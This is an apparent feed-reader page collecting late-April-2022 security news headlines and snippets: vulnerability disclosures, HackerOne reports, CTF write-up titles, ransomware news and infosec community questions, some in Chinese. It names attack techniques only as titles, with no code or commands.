    How to save fiddler everywhere result in SEQUENCE it captured ? I'm trying to save the raw date IN SEQUENCE it captured but unable to save in sequece it captured.
    submitted by /u/sahastra [link] [comments]
    How to master Google Hacking (Dorking)
    submitted by /u/hisfuntie [link] [comments]
    Bypassing LDAP Channel Binding with StartTLS
    submitted by /u/AlmondOffSec [link] [comments]
    ExtraReplica: cross-account database vulnerability in Azure PostgreSQL
    submitted by /u/sagitz_ [link] [comments]
    nimbuspwn detector (CVE-2022-29799 & CVE-2022-29800) - check whether local system is possibly vulnerable
    submitted by /u/SRMish3 [link] [comments]
    FindFunc: An IDA plugin for advanced function matching by assembly template, constants, string/name/byte reference
    submitted by /u/feberx [link] [comments]
    Elevation of privilege Linux vulnerability: Nimbuspwn
    submitted by /u/0xdea [link] [comments]
  • Open

    Chrome 102: Window Controls Overlay, a Host of Finished Origin Trials, PWAs as File Handlers and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 102 is beta as of April 28, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Window Controls Overlay for Installed Desktop Web Apps Window controls overlay extends an app's client area to cover the entire window, including the title bar, and the window control buttons (close, maximize/restore, minimize). The web app developer is responsible for drawing and input handling for the entire window except for the window controls overlay. Developers can use this feature to make their installe…
  • Open

    War in Ukraine / April 27
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Gamified Vaults: Play, Find, Get Paid
    Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their Solidity… Continue reading on Medium »
    Contact Point Deanonymization Vulnerability in Meta
    This post is about an bug that I found on Meta (aka Facebook) which used to find a linked Primary email address of a account using mobile… Continue reading on Medium »
    We Rescued $4M from Rari Capital. But Was It Worth It?
    On April 6th, we discovered a verified Fuse pool in Rari Capital used a weak price oracle prone to manipulation. Usually, exploiting a… Continue reading on Medium »
    Subdomain Takeover using Mobile??
    Go to https://virustotal.com. Click on search section enter domain and click on search. Continue reading on Medium »
    It’s All About DMARC
    Hello Everyone, Continue reading on Medium »
  • Open

    SecWiki News 2022-04-28 Review
    链上追踪:洗币手法科普之波场 TRON by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-28 Review
    链上追踪:洗币手法科普之波场 TRON by ourren 更多最新文章,请访问SecWiki
  • Open

    NFT Crime: From the Simple to the Ingeniously Simple
    If you guessed these two things—a 10-kilo bar of gold and this image from the Bored Ape Yacht Club (BAYC)—cost about the same, roughly $600,000, you’d be right. And if it’s hard to believe this is true, you’d be like almost everyone else in the world. Basically, a one-of-a-kind cartoon in a type of video... The post NFT Crime: From the Simple to the Ingeniously Simple appeared first on TrustedSec.
  • Open

    PicoCTF 2022 Web Exploitation
    No content preview
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
    No content preview
  • Open

    PicoCTF 2022 Web Exploitation
    No content preview
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
    No content preview
  • Open

    PicoCTF 2022 Web Exploitation
    No content preview
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
    No content preview
  • Open

    What’s your favorite UEBA these days?
    I’m growing tired of Exabeam at a medium sized enterprise. Just using AA, feeding it from a data lake. I’ve been looking into it, but it can be difficult to cut through marketing jargon to determine if the tools are just SIEMs or if they do the modeling of a UEBA. submitted by /u/justaninfosecaccount [link] [comments]
    Legal Defense asking for Google Username/Password?
    I have a friend who is preparing for a legal defense (defamation case.) The company he hired to help prepare the defense asked for all case-associated email. They also asked for the his and his teams Google accounts and passwords to "do the email search for them." Obviously no one is going to share that level of access, but is asking enough of a red flag to fire the preparation company? Is this a common accepted ask for permission? Any frame of reference here? submitted by /u/Freakskull [link] [comments]
  • Open

    从0到1完全掌握 SSTI
    SSTI 即为对模板引擎的注入,从简单探测自己构造 EXP 的讲解。
    FreeBuf早报 | 北京健康宝遭境外网络攻击;有文件揭示Facebook违法使用用户数据
    4月28日,北京健康宝使用高峰期遭受网络攻击,经初步分析,网络攻击源头来自境外,受攻击期间,北京健康宝相关服务未受影响。
    链上追踪:洗币手法科普之波场 TRON
    TRON 上没有混币器,黑客又是如何洗币?
    最新全球网络攻击事件大盘点-政府&企业
    政府&amp;企业:全球范围内最新网络攻击中的代表性事件大盘点
    Linux Nimbuspwn漏洞可能允许攻击者部署复杂的威胁
    攻击者可以利用该漏洞进行各种恶意活动.
    影响甚微 数据泄露后Conti活动有增无减
    近日,戴尔旗下安全公司Secureworks的研究人员表示,尽管受到近期内部数据泄露的影响, Conti勒索软件团伙的活动依旧非常活跃。
    影响甚微 数据泄露后Conti活动有增无减
    近日,戴尔旗下安全公司Secureworks的研究人员表示,尽管受到近期内部数据泄露的影响, Conti勒索软件团伙的活动依旧非常活跃。
    Gartner:响应网络安全事件的3个必备工具
    从 Gartner 披露的信息来看,2021 年发生的安全事件平均违规成本达到了 17 年以来的峰值。
    美国悬赏1000万美元,征集6名俄罗斯沙虫组织成员线索
    美国政府提供了高达 1000 万美元的奖金,悬赏六名俄罗斯黑客。
    2021年利用最多的前15个漏洞出炉,附列表
    网络安全当局在联合咨询报告中进一步敦促企业和组织,应及时修补这些安全漏洞并实施补丁管理系统以减少暴露的攻击面。
    今年一季度暴露的数据库数量创新高,Redis排第一
    2022 年第一季度,暴露的数据库峰值数量达到了 91200 个,创造了历史记录。
  • Open

    Automate Active Directory(Installation(Packer)+Provisioning(Vagrant))
    Hi Readers, Here we will be looking into automation of ad deployment. This challenge is part of Auror Project initiative by Zscaler’s… Continue reading on Medium »
  • Open

    subdomain takeover (abandoned Zendesk .easycontactnow.com)
    8x8 disclosed a bug submitted by bx_1: https://hackerone.com/reports/1486670
  • Open

    New dork here, nice place.
    I am confused how this entirely works though. I tried drive.google.com/drive/folders and it just wanted to log me into my own google drive? So I’ve tried using a few of the front ends, and they’re nice. I just don’t feel like I’m stomping through the mud like I wanted, you know? So how does one do the basic, dig through random unsecured files thing? Also, what is a percentage chance I find something fun/dangerous? Glad to be here folks! submitted by /u/Mr_Goodnite [link] [comments]
    A lot of old 3D Images, ranging from 1996-2006
    submitted by /u/cicada-man [link] [comments]
  • Open

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116 Comments URL: https://news.ycombinator.com/item?id=31188124 Points: 1 # Comments: 0

  • Open

    Undesignated File during Examination
    When you examine a mobile data set case where the data is previously extracted and your files are not designated what is the methodology to turn them into workable data like a .db file? My extraction folder is essentially the usual plist and mbdb files and a 1kb to 2000kb series of files like: Description: 5435435hjhj45454521 Type: File ​ Any terminology or process to explain or aid my google research would be immensely helpful submitted by /u/CharsCour [link] [comments]
    What’s after LE forensics?
    Hello InfoSec peeps, I have been a digital forensic analyst for a law enforcement organisation in the UK for about 3 years now. I love digital forensics but the work within law enforcement has become extremely tedious for several reasons which I assume most of you will be aware of (prohibited images being 90% of the work + not a massive amount of actual analysis going on due to the first reason as more often than not their is no need). I have experience with the majority of forensic tools you’d expect LE to have and very well informed regarding laws and legislations. In addition to this, I have very good InfoSec knowledge from self study and research. I am now beginning to explore other career paths but I am slightly lost as to what my potential next steps and career trajectory could…
    Champlain College: M.S. in DF or M.S. InfoTech with DFIR Concentration
    My hope is to enter a digital forensics role, but I also don’t want to pigeonhole my career to only be able to do that. Would I be better off doing InfoTech with DFIR? submitted by /u/invictusliber [link] [comments]
  • Open

    Looking For Vulnerable Redis Servers (CVE-2022-0543)
    submitted by /u/chicksdigthelongrun [link] [comments]
    DEGU: userland kit that doesn't use sys_clone/sys_execve call to run
    submitted by /u/Background-Degree-50 [link] [comments]
    A flow-based IDS using Machine Learning in eBPF
    submitted by /u/paran0ide [link] [comments]
    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV [link] [comments]
    Hands-on lab for exploiting Psychic Signatures in JWTs
    submitted by /u/DebugDucky [link] [comments]
    Encrypting our way to SSRF in VMWare Workspace One UEM/Airwatch (CVE-2021-22054)
    submitted by /u/FireFart [link] [comments]
    Kubernetes Security Series - https://smart7.in/2022/03/30/Kubernetes-Cluster-Attack-Defense-Importance-of-Network-Policies.html
    submitted by /u/agrawal7 [link] [comments]
    Package Planting: Are You [Unknowingly] Maintaining Poisoned Packages?
    submitted by /u/mkatch [link] [comments]
    CVE-2021-22204 : Exploiting remote code execution within VirusTotal platform in order to gain access to its various scans capabilities
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Weird PDF to my gmail account that I accidentally opened in gmail
    Hi everyone, did a bit of a stupid thing recently. Got this email by an address with a perfectly normal name and there was a pdf attached to it. I didn't really think much about it (because I get these regularly for university) and klicked the attachment so that it opened in that weird gmail viewer. I didn't download it, just clicked the attachment. I didn't actually know the email address, just clicked without thinking. Then I realized that the body of the email was just gibberish letters and numbers with spaces arbitrarily between, something like "ashene qlossa 90442 12394" and so on (would prefer not to copy paste the entire thing here in case it's something actually meaningful to someone). Obviously not legitimate. The attachment itself started as this sex website advertisement thing, but the further you went down, it was just weird numbers and lines in different colors. When I saw that, I closed the attachment immediately. I realized that the .pdf had a link attached over the entire thing (all of the pdf was attached to a different website essentially), but I didn't click, just had the attachment open for 2-3 seconds tops. So my question is... could anything bad have happened while I had the pdf open in the gmail viewer? Full Windows defender scan didn't show anything afterwards and the pdf is safe according to virustotal, which just confused me more because obviously the pdf has to be unsafe in some way, right? Sorry for the rambling post, I'm just a bit unsure about what exactly this is. Would appreciate any help. submitted by /u/Pronounta [link] [comments]
    Compromised Internet Routed (need advice)
    is it possible that someone that had access to my router, installed a firewall program and is restricting my access to certain sites? i ask because i am able to access said site on my mobile device on my mobile data, and when i use a mobile data hot spot on my PC, however when i connect to my WiFi i can't gain access to said site on my PC or my mobile. any advice on how to detect such a thing or to prevent such a thing from occurring again would be greatly appreciated. submitted by /u/Severe_Document2108 [link] [comments]
    Password Manager with Blind Autofill?
    Looking for a psw manager that can fill fields without displaying the information. I.e. a saved credit card can be used to make purchases by a registered low permissions user without being displayed in manager / in browser after filled. Please let me know if you know any solution that fits the bill thx. submitted by /u/polloloco067 [link] [comments]
    Where do you store shared QR Codes?
    Looking for any solutions anyone has for storing shared QR codes. For example, one that might be needed for an Authenticator rotating one-time-password app that a team of people share. The ideal solution would be the same place a shared password is kept for one-stop shopping for these types of secrets. submitted by /u/Johnny_BigHacker [link] [comments]
    Seeking Advice: moving from productivity based in a security firm to high level individual contributor and primary security expertise -- how to quickly adapt?
    Salutations! I believe this may be the right place to ask so here goes: Background: I worked my way up from help desk into security, and now I'm professional level (5+ years). My previous positions have all been with technically gifted security firms where there were several layers of professionals and safety nets above me and below me; both in terms of expertise and relationships. Being around fellow security specialists day in and day out is a privilege I didn't previously realize. Situation: I currently am a new hire to a company whose maturity model is still being developed and I am now one of the few primary security disciplines on staff and work with a cross functional team who are all people leaders. This is intimidating and somewhat stressful, I know deep down I am capable to…
    Sysmon for SME <50 employees?
    I'm a IT jack-of-all-trades / master-of-none for a small business with about 40 users give or take. I'm also thinking of persuing a career in Netsec seeing as I basically have my own environment to play with... I've taken great strides in Netsec and going to be sitting my CISSP soon. Have implemented endpoint security, tidied up AD (particularly admin) accounts, set up 3-2-1 backups, etc etc Anyway my question is on the SIEM side. Being a small business I've found SIEMs a) very expensive and b) hard to get my head around. One suggestion I've seen a few times is enabling sysmon and using some kind of opensource product to monitor - GRR? SNORT? - Is sysmon going to eat up resources (per device?) - Being a newbie/scrub, will I get meaningful info? Is this worth persuing? Is this a must? I do have time and energy to invest in this. Appreciate any responses and hopefully not too much scoffing at my noobness! submitted by /u/saladnicoise [link] [comments]
    Search engine pre-registration (criminal ip ????)
    I'm currently a student studying vulnerability and security. I mainly use OSINT and search engine to study security. I know that there are many products for the search engine, such as Censys and shodan. I used Shodan for a certain period of time, but first of all, I felt that the performance was good. But as a student, there is a burden in terms of price. So I once shared a list of search engines that people use in the OSINT community, and there was a search engine called Criminalip. It's a search engine similar to Shodan, and the functions are very similar. But as I'm just starting to study security, I still don't know which search engines are highly utilized. So I'm trying to use this and that. This time, that criminal ip has registered for the beta test, and I registered in advance and got a free pass for 6 months. If there are students who have a price burden to use Shodan, I think you can refer to it. Below is the list of search engines that I shared before and the clinical ip url that I applied for the beta test. Oh! And since it's sharing for studying, I hope you don't think it's a promotion or an advertisement! ​ ​ https://criminalip.io ​ https://www.reddit.com/r/OSINT/comments/u0yv15/search_engines_for_people_doing_osint/?utm_source=share&utm_medium=web2x&context=3 submitted by /u/Alexiosplana [link] [comments]
  • Open

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116.html Comments URL: https://news.ycombinator.com/item?id=31184926 Points: 5 # Comments: 0
    VirusTotal debunks claims of a serious vulnerability in Google-owned antivirus
    Article URL: https://portswigger.net/daily-swig/virustotal-debunks-claims-of-a-serious-vulnerability-in-google-owned-antivirus-service Comments URL: https://news.ycombinator.com/item?id=31182396 Points: 2 # Comments: 1
    Commit Level Vulnerability Dataset (For Android)
    Article URL: https://blog.quarkslab.com/commit-level-vulnerability-dataset.html Comments URL: https://news.ycombinator.com/item?id=31180203 Points: 1 # Comments: 1
    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    Article URL: https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ Comments URL: https://news.ycombinator.com/item?id=31179270 Points: 15 # Comments: 1
  • Open

    NASA FTP with data organized by mission, and some file conversion software too
    The Space Physics Data Facility (SPDF) hosts the NASA non-solar heliophysics archive of current and past heliophysics missions and related ground-based and non-NASA data. https://spdf.gsfc.nasa.gov/pub/ submitted by /u/osendai [link] [comments]
    dorky band photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    pictures of antiques
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Many, many pictures of clothes and accessories on display.
    submitted by /u/HGMIV926 [link] [comments]
  • Open

    Passive Reconnaissance Using Only Kali Terminal | Infosec |
    Disclaimer: This blog is only for educational purpose. Continue reading on System Weakness »
    Passive Reconnaissance Using Only Kali Terminal | Infosec |
    Disclaimer: This blog is only for educational purpose. Continue reading on Medium »
    You need to hear this if you are new/want to start bug hunting
    Hello everyone, Continue reading on Medium »
    Bypassing WAF for $2222
    I know it’s been a very long time since I last published my article on how I was able to find RCE on Bentley systems. For the last 1–1.5… Continue reading on Medium »
    AD Pentesting Notes
    If you just have access to an AD environment but you don’t have any credentials/sessions you could: Pentest the network: Scan the network… Continue reading on Medium »
    4EVERLAND chính thức khởi động “First Leap Program” với giải thưởng lên đến 15 triệu 4EVER
    Kính chào toàn thể người dùng, Continue reading on Medium »
  • Open

    War in Ukraine / April 26
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    What are red-blue teams in hacking?
    A red team is an offensive security professional with expertise in breaking into defenses and attacking systems. A blue team, on the other… Continue reading on Medium »
    What are the types of white box testing?
    White box testing happens to be a form of software testing, which assesses the internal working structure of an application. It also… Continue reading on Medium »
    AD Pentesting Notes
    If you just have access to an AD environment but you don’t have any credentials/sessions you could: Pentest the network: Scan the network… Continue reading on Medium »
  • Open

    FreeBuf早报 | 英国陆军征兵网站因数据泄露下线月余;纽约或将加密欺诈纳入刑法
    谷歌4月27日起在安卓(Android)官方应用商店Google Play推出应用隐私政策,安卓用户将能查看APP收集的隐私数据(及其目的和用途)。
    实锤!可口可乐证实受到网络攻击并开展调查
    全球最大软饮制造商可口可乐公司在近日发布的一份声明中证实,公司相关网络受到了攻击,目前已对攻击行为开展调查。
    安卓木马VajraSpy伪装成聊天软件,瞄准巴基斯坦军方
    研究人员发现,APT-Q-43 组织使用 VajraSpy 木马伪装成名为 Crazy Talk 的聊天应用程序,攻击巴基斯坦军方人员。
    宁波通商银行股份有限公司招聘安全管理岗
    宁波通商银行股份有限公司招聘2名安全管理岗。
    软件成分安全分析(SCA)能力的建设与演进
    本文主要介绍 SCA 能力在企业内部实际落地的过程、遇到的问题以及对 SCA 技术的看法和展望。
    黑客利用关键的VMware RCE漏洞安装后门
    高级黑客正在积极利用影响VMware Workspace ONE Access的关键远程代码执行(RCE)漏洞CVE-2022-22954。
    《中国「网安宇宙」高效运营从安全服务到MSS 》报告正式发布
    为深入了解网络安全托管服务MSS对中国网络安全建设的战略意义,FreeBuf咨询结合定量与定性等分析方法展开深入研究。
    Black Basta勒索软件攻击美国牙科协会
    美国牙科协会遭到了网络攻击。目前,该协会正在积极调查攻击事件,同时关闭了部分网络系统。
    网络安全纳入央企负责人经营业绩考核
    《办法》将网络安全纳入考核范围,并视情节给予负责人相应的处分,进一步提高央企防范重大网络安全事件的能力和水平。
    Dirty Pipe 漏洞报告全文翻译
    根据dirty pipe漏洞英文文章进行了下翻译,文中有内存位置由于涉及敏感字符,进行了修改。
    Log4Shell 过气了?攻击面仍大量存在
    研究显示,Log4Shell漏洞的修补情况不容乐观,仍有大量企业组织在使用过时或易受攻击的版本。
    「网安新势力」的Call in,快接!
    「网安新势力Solo发布季」请你来玩了~
  • Open

    SecWiki News 2022-04-27 Review
    CodeQL进阶知识(Java) by ourren 从源代码的控制流图中学习特性以定位缺陷 by ourren A blueprint for evading industry leading endpoint protection in 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-27 Review
    CodeQL进阶知识(Java) by ourren 从源代码的控制流图中学习特性以定位缺陷 by ourren A blueprint for evading industry leading endpoint protection in 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize
  • Open

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize
  • Open

    Container escape on public GitLab CI runners
    GitLab disclosed a bug submitted by ec0: https://hackerone.com/reports/1442118
    CVE-2022-27776: Auth/cookie leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1547048
    CVE-2022-27775: Bad local IPv6 connection reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1546268
    CVE-2022-27774: Credential leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1543773
  • Open

    Using PGP to enhance security and non-repudiation of terraform ops
    No content preview
  • Open

    Using PGP to enhance security and non-repudiation of terraform ops
    No content preview
  • Open

    Using PGP to enhance security and non-repudiation of terraform ops
    No content preview

  • Open

    What is the one thing ( or skill ) that you should focus on in exploit dev?
    submitted by /u/morizk90 [link] [comments]
    developing a remote exploit for a stack overflow in Linux CVE-2022-0435, not including KASLR
    submitted by /u/ozxsl2w3kejkhwakl [link] [comments]
  • Open

    Inszene der Heimatschutzbehörde enthüllt eine große Anzahl von Mängel
    Continue reading on Medium »
    Untitled
    Self XSS Continue reading on Medium »
    My Pentest Log -16- (XS Size A Little Tip)
    Greetings to all from a springtime Constantinople, Continue reading on Medium »
  • Open

    KrbRelayUp - local privilege escalation in Windows domain environments where LDAP signing is not enforced
    submitted by /u/0xdea [link] [comments]
    Introduction to VirtualBox security research and fuzzing
    submitted by /u/nibblesec [link] [comments]
    Thinkstscapes Q1 2022 research round-up
    submitted by /u/ranok [link] [comments]
    New CloudGoat scenario: Vulnerable-by-Design Lambda functions
    submitted by /u/hackers_and_builders [link] [comments]
  • Open

    Vulnerability Roundup – April 2022
    Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. Remote Code Execution (RCE) Elementor WordPress Plugin Installations: 5,000,000+ Patched Version: 3.6.3 Vulnerability: Remote code execution (RCE) Severity: Critical CVE: CVE-2022-1329 This critical vulnerability leverages a lack of capability checks found in vulnerable versions of the Elementor plugin. Continue reading Vulnerability Roundup – April 2022 at Sucuri Blog.
  • Open

    SQL Injection on https://soa-accp.glbx.tva.gov/ via "/api/" path - VI-21-015
    Tennessee Valley Authority disclosed a bug submitted by yassinek3ch: https://hackerone.com/reports/1125752
    Stored XSS in "product type" field executed via product filters
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1404770 - Bounty: $500
    RCE via exposed JMX server on jabber.37signals.com/jabber.basecamp.com
    Basecamp disclosed a bug submitted by ian: https://hackerone.com/reports/1456063 - Bounty: $100
  • Open

    Windows Indexing Locations
    Hi all, I’m trying to see if a Windows 10 Pro computer was set up so that when a USB drive was connected, it would index the files/folders on the drive. Does anyone know where this information is stored? Im thinking it’s a registry key but I’m not finding too much info online about it. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]
  • Open

    OSINT of website…
    Let’s look at the topic of information sources for OSINT research of websites today. I’ll be interested to learn about the personalities… Continue reading on Medium »
    War in Ukraine / April 25
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Will Elon Musk Revolutionize The World of OSINT and Campaigns?
    Elon Musk’s effort to acquire Twitter passed an important milestone yesterday when Twitter’s Board of Directors recommended to accept his… Continue reading on Medium »
  • Open

    Finding IP addresses in a Network
    When you land on a huge big network with several VLAN’s and are unsure of where to look or start! Continue reading on Medium »
    TryHackme — Alfred(Exploit Jenkins Service Gain To Authority/System)
    Hi semua pada artikel ini saya akan membagikan write up mechine tryhackme yang bername alfred mechine ini berfokus pada teknologi jenkins… Continue reading on Medium »
    gcpHound v2.0 : Django Web UI To Analyze IAM Permissions
    In this article, we will talk about recent functionalities added to the gcpHound as well as how to use them. Continue reading on Medium »
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    No content preview
    Tryhackme: AgentSudo
    No content preview
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    No content preview
    Tryhackme: AgentSudo
    No content preview
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    No content preview
    Tryhackme: AgentSudo
    No content preview
  • Open

    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-04-26 Review
    《软件分析》课程实验作业平台概述 by ourren xray联动crawlergo自动化扫描爬坑记 by sinver 利用远程进程分叉转存Lsass凭据 by sinver 记一次护网漏洞发现到域控全过程 by sinver 记一次Discuz X3.4后台getshell by sinver 无需免杀获取域控hash小技巧 by sinver 利用ProxyShell漏洞获取域控所有Hash by sinver 红队必备技能之隐蔽的技巧 by sinver 针对移动支付的道德反欺诈系统 by ourren Pentest_Note: 渗透测试常规操作记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-26 Review
    《软件分析》课程实验作业平台概述 by ourren xray联动crawlergo自动化扫描爬坑记 by sinver 利用远程进程分叉转存Lsass凭据 by sinver 记一次护网漏洞发现到域控全过程 by sinver 记一次Discuz X3.4后台getshell by sinver 无需免杀获取域控hash小技巧 by sinver 利用ProxyShell漏洞获取域控所有Hash by sinver 红队必备技能之隐蔽的技巧 by sinver 针对移动支付的道德反欺诈系统 by ourren Pentest_Note: 渗透测试常规操作记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    Overwhelmed by vulnerabilities? Here’s the best way to prioritize them.
    We know that software vulnerabilities remain one of the primary causes of external attacks. We also know that on average, vulnerabilities are exploited for the first time just days after they’re disclosed. You may be managing many third-party applications, so how can you make sure you can drive remediation and reduce the risk for all your software? Once vulnerabilities are discovered, how will you know which ones should be prioritized? A common misconception is that every vulnerability in your organization should be addressed immediately, but keeping up with vulnerability disclosures that affect your environment is a constant, ongoing challenge. It…
  • Open

    Go에서 Stdin에 대한 테스트 코드 작성하기
    테스트 코드 작성 중 우리가 예측 가능한 함수 인자 값은 쉽게 체크가 가능하지만, 시스템으로 부터 넘어오는 데이터는 막상 작성하려고 하면 어떻게 해야할지 고민이 되기 시작합니다. 오늘은 그 중 하나인 Stdin에 대한 테스트 코드 작성 이야기를 하려고 합니다. Pipe trick Stdin은 테스트 코드상에서 os.Pipe()와 간단한 트릭을 사용해 통제할 수 있습니다. os.Pipe() 먼저 os.Pipe() 는 아래와 같은 리턴을 가집니다. 그리고 설명을 읽어보면 첫번째 리턴인 r과 두번째 리턴인 w가 서로 연결된 File 오브젝트라고 합니다.
  • Open

    CVE-2022-24706: Apache CouchDB Remote Privilege Escalation
    Article URL: https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 Comments URL: https://news.ycombinator.com/item?id=31167557 Points: 2 # Comments: 1
  • Open

    Defending the Gates of Microsoft Azure With MFA
    Since Russia’s invasion of Ukraine, companies based in the United States have been on alert for potential cyberattacks on IT infrastructure. Multi-Factor Authentication (MFA) has been one of the most recommended settings for organizations to turn on. Recently, the White House issued a FACT SHEET on how organizations can protect themselves against potential cyberattacks from... The post Defending the Gates of Microsoft Azure With MFA appeared first on TrustedSec.
  • Open

    Java代码审计一危险函数分析与利用(二)
    从这段时间开始我将继续开始分享我在学习代码审计时的遇到的问题以及我个人在学习时的感悟。
    专访F5陈亮:数字化浪潮下的应用与安全
    如何有有效减轻应用激增的压力,缓解企业网络安全风险,让企业的数字化转型安然进行,是企业需要解决的问题。
    FreeBuf早报 | 伊朗黑客利用RCE漏洞部署后门;BotenaGo变种针对Lilin摄像头
    网络攻击者Rocket Kitten正在积极利用VMware漏洞,以此获得初始访问权限,并在系统上部署Core Impact渗透测试工具。
    斗象攻防演练宝典系列之神剑出鞘
    2022年大型攻防演练即将来临,你准备好了吗?
    赠书福利 | 企业数据安全建设,这本书不可或缺!
    《数据安全实践指南》对数据安全全生命周期的过程域逐一进行解读并提供实践操作建议。
    伊朗宣布挫败针对公共服务的大规模网络攻击
    近日,伊朗国家电视台宣布挫败了若干起大规模网络攻击,其攻击的目标是政府和私人组织运营的公共服务。
    CISA在漏洞利用列表中增加了7个新漏洞
    CISA在其积极漏洞利用的安全问题列表中新添加了7个漏洞
    病毒利用驱动人生升级通道及高危漏洞传播 12月14日半天感染数万台电脑
    12月14日,病毒利用驱动人生升级通道及高危漏洞传播 12月14日半天感染数万台电脑
    谷歌修复了VirusTotal平台的高危RCE漏洞
    VirusTotal 平台出现安全漏洞,攻击者可能利用该漏洞实现远程代码执行。
    美指控朝鲜APT利用新型恶意软件攻击记者
    当地时间4月25日,美国新闻网站NK News称,其发现朝鲜支持的APT37正利用一种新型恶意软件样本攻击在朝记者。
    俄乌争端致使 DDoS 攻击达到历史最高水平
    与 2021 年第四季度相比,2022 年第一季度的DDoS)攻击增加了 46%,大部分攻击被用于针对俄罗斯。
  • Open

    File Formats
    Having an understanding of file formats is an important factor in DFIR work. In particular, analysts should understand what a proper file using a particular format should look like, so that they can see when something is amiss, or when the file itself has been manipulated in some manner. Understanding file formats  goes well beyond understanding PE file formats and malware RE. Very often, various Microsoft file formats include data, or metadata (defined as "data about data") that can be mined/parsed, and then leveraged to tremendous effect, furthering overall analysis and intelligence development, often across multiple cases and campaigns. LNK Windows shortcut, or LNK files, have been covered extensively in this blog, as well as other blogs, in addition to having been well documented by MS…

  • Open

    Trying to carve Office documents but they always open corrupted, Help pls
    submitted by /u/KTthemajicgoat [link] [comments]
    Quantum ransomware analysis
    New week, new report! This time me, 0xtornado and svch0st collaborated on a #QuantumRansomware compromise. ➡️ ISO file ➡️ PsExec ➡️ *attacker hostname* TERZITERZI ➡️ much more! https://thedfirreport.com/2022/04/25/quantum-ransomware/ submitted by /u/samaritan_o [link] [comments]
    Extract Bitlocker Clear Key?
    Hi, i got 2 Bitlocker encrypted drives on whom Bitlocker itselves is disabled so that there must be a Clear Key stored on the drive. I can access the Data with Magnet Axiom, witch autodiscovered the Key, but I want to run some other examinations with other tools on it. So my question is does anybody know where exactly the Clear Key is stored? Thanks for any help submitted by /u/kaibring [link] [comments]
  • Open

    Local file disclosure through SSRF at next.nutanix.com
    Nutanix disclosed a bug submitted by tosun: https://hackerone.com/reports/471520
    Force User to Accept Attacker's invite [ Restrict user to create account]
    Krisp disclosed a bug submitted by sammam: https://hackerone.com/reports/1420070 - Bounty: $100
    Visibility Robots.txt file
    Krisp disclosed a bug submitted by razahack: https://hackerone.com/reports/1450014
    Xss triggered in Your-store.myshopify.com/myshopify.com/admin/apps/shopify-email/editor/****
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1472471 - Bounty: $2900
    CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256 comparison disaster
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549435
    CURLOPT_SSH_HOST_PUBLIC_KEY_MD5 bypass if string not 32 chars
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549461
  • Open

    ClusterFuzz is a scalable fuzzing infrastructure
    Article URL: https://github.com/google/clusterfuzz Comments URL: https://news.ycombinator.com/item?id=31160965 Points: 2 # Comments: 0
  • Open

    What you doing wrong when you fail at bug bounties?
    Hi all, I hope all is well. I have 3+ years bug bounty experience so I want to talk about the common mistakes when doing bug bounty… Continue reading on Medium »
    Open-Redirects
